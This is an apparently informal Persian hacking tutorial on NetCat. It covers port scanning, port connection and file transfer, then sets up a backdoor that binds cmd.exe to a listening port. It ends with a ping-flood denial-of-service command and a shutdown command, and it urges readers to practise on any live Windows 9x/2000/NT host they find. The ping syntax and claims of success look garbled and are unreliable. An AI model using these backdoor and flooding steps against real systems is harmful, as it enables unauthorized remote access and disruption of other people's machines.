میتوان گفت هیچ یک از حملات شبکه ای بدون نام بردن از NetCat کامل نخواهد بود. این برنامه میتواند هم برای مدیران سیستم و هم برای مهاجمان مورد استفاده قرار بگیرد. NetCat در ابتدا توسط Hobbit نوشته شد و در اوایل سال 1996 منتشر شد که البته برای سیستم های Unixنوشته شده بود, و در سال 1998, Weld Pond نسخه ای برای ویندوز را ایجاد کرد.
NetCat مثل یک ابزار شبکه ای همه منظوره است که برای ارسال یا دریافت داده ها از هر پورت TCP یا UDP به هر پورت UDP یاTCP به کار میرود. همچنین میتوان به عنوان ,Port scanner Backdoor ,Port listener ,downloda, uploader و... استفاده کرد.
حال با چند مثال به بررسی چند کاربرد این برنامه میپردازیم.
Port scanning
برای اسکن کردن پورت های باز (پورت های در حالت listening) یک سیستم خط زیر را
به کار میبریم:
nc –v –w 2 –z [target] 10-100
در اینجا target نام یا IP سیستمی که می خواهیم اسکن کنیم است.
سویچ -v اطلاعاتی درباره اتصال میدهد.
سویچ -wزمان استفاده شده برای ایجاد یک اتصال را محدود میکند.
سویچ-z نیز از ارسال هر گونه داده جلوگیری میکند و باعث سریعتر شدن اسکن میگردد.
در این حالت nc تمام پورت های باز سیستم را که بین 1 تا 100 هستند اسکن میکند و نام پورت های معروفی مثل 21 یا 23 که پورت های FTP و Telnet می باشند را نیز نمایش میدهد.
البته NetCat وسیله سریعی برای پورت اسکنینگ نیست و برای اینکار برنامه ای مانند Nmap بهتر عمل میکند.
Connect to Port
برای اتصال به یک پورت از یک سیستم میتوان از خط زیر استفاده کرد:
nc –v –n [target] [port number]
با استفاده از سویچ –n NetCat فقط ادرس هایIP عددی را می پذیرد.
از این دستور میتوان به جای telnet در ویندوز استفاده کرد که هم باعث خوانا شدن نوشته ها میشود و همچنین پایدارتر از telnet است.
Backdoor
یکی از کاربرد های دیگر nc . استفاده از ان به عنوان Backdoor است. برای این کار خط زیر را اجرا میکنیم:
nc –L –p [port number] –d –e [cmd.exe]
سویچ –L nc را در حالت listen راه می اندازد
سویچ-p شماره پورتی را که میخواهید به ان وصل شوید مشخص میکند.
سویچ –d نتکت را در حالت جدا از کنسول اجرا میکند.
سویچ –e برنامه ای را که شما مشخص کرده اید اجرا میکند.
در اینجا port number شماره پورت است که میتواند هر پورتی باشد (پورت رزرو نشده) و شما میخواهید به ان پورت وصل شوید.
(Command prompt) cmd.exe هم برنامه ای است که پس از اتصال به nc روی آن پورت اجرا خواهد شد. در این قسمت اگر برنامه ای که میخواهید پس از وصل شدن اجرا شود در Directory nc نباشد باید نام درایو و directory آن را هم بنویسید:
nc –L –p 5566 –d –e c:winntsystem32cmd.exe
در این حالت nc روی پورت 5566 در حالت listening قرار میگیرد و به محض برقراری ارتباط cmd.exe را روی این پورت فعال میکند.
File Transfering
از کاربردهای دیگر این برنامه انتقال فایل بین دو سیستم است. بسیاری از شبکه ها جلوی FTP را میگیرند یا اینکه به دلیلی شما نمیتوانید از TFTP استفاده کنید. میتوان به وسیله nc فایل را با استفاده از پورت TCP و UDP منتقل کرد.
برای این کار باید nc را در حالت listen در سیستم مقصد راه انداخته و خروجی ان را به یک فایل منتقل کنیم. در سیستم مبدا نیز ان را در حالت client قرار میدهیم تا به سیستم مقصد روی پورت مورد نظر وصل شود و فایل وروی را منتقل میکنیم.
کامپیوتر مبدا:
client pc(recive file): nc –l –p [port] > [file]
کامپیوتر مقصد:
Srver pc(sending file): nc [client-IP] [port] < [file]
با به کار بردن سویچ –u فایل به صورت UDP انتقال میابد.
برای مثال میخواهیم فایل hack.htm را به کامپیوتری با IP 192.168.0.1 بفرستیم:
روی کامپیوتر مقصد این خط را مینویسیم:
nc –l –p 5566 > hack.htm
پورت 5566 را به صورت دلخواه انتخاب کرده ایم.
روی کامپیوتر خود نیز این خط را مینویسیم:
nc 192.168.0.1 < hack.htm
همیشه اول باید nc را روی کامپیوتر مقصد اجرا کنید.
shutdown -s -t 30
نظر تون را درباره با فرمان بالا بدهید.
توضیح کامل را بعدا براتون می نویسم.
اما شما چی فکر می کنید.........
این روش فقط بر روی ویندوزهای 9x , 2000 , nt قابل اجرا میباشد
IP مورد نظر را پیدا کرده و به آن Ping کرده و از وجود ان اطمینان حاصل کنید . در ادامه از طریق DOS دستور زیر را وارد
کنید Ping -v igmp 192.168.0.199 -l 1500 -t
سوییچ v به ما اجازه ی استفاده از پروتوکولهای مختلف میدهد -l حجم پکتها و -t فرستادن این پکتها بدون مکس را انجام میدهم زمانی که با پیغام Target is unreachable مواجه شدید کار با موفقیت انجام گرفته .
یادتون باشه وقتی شروع به یادگیری می کنید باید مرحله به مرحله پیش بروید.
فعلا لازم نیست تا روی یک IP خاص این کار انجام دهید.سعی کنید یک IP
فعال پیدا کنید که سیستم عامل آن 9x , 2000 , nt باشد. خوب حتما میگویید
-- به چه روشی می توان به نوع سیستم عامل هدف پی برد؟؟؟
خوب خیلی ساده با نرم افزار GFI:LANguard Security Scaner
می شود نوع سیستم عامل هدف را بدست آورد.
البته کارایی این نرم افزار خیلی بیشتر است که به مرور براتون می نویسم.
شاد و خوشحال باشید.